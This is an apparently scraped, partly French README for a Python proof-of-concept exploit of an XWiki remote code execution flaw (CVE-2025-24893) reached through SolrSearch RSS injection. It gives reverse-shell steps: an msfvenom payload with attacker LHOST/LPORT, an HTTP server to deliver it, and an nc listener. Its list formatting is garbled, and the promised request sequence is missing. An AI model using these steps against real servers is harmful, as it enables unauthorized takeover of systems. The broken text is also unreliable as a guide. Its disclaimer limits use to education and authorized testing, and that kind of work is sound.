
PoC exploits CVE-2025-24893 , a remote code execution (RCE) vulnerability in XWiki caused by improper sandboxing in Groovy macros rendered asynchronously. It allows arbitrary command execution through injection into RSS-based SolrSearch endpoints.
Auteurs : Net.Doge & Infinit3i
Ce script Python exploite CVE-2025-24893, une vulnérabilité d'exécution de code à distance (RCE) dans XWiki causée par un sandboxing inadéquat dans les macros Groovy exécutées de manière asynchrone. Il permet l'exécution de commandes arbitraires via une injection dans les endpoints RSS basés sur SolrSearch.
msfvenom)Clonez ou téléchargez le script.
Assurez-vous d'avoir les éléments suivants installés :
msfvenom de Metasploitjq (utilisé dans les payloads bash)Exécutez le script :
python3 CVE-2025-24893-PoC.py
Choisissez dans le menu :
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<votre_ip> LPORT=<port_beacon> -f elf -o rev
python3 -m http.server 8080
nc -lvnp 31337
Le script envoie la séquence suivante à la cible :
Cet outil est destiné uniquement à des fins éducatives et de tests autorisés. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégale et contraire à l'éthique.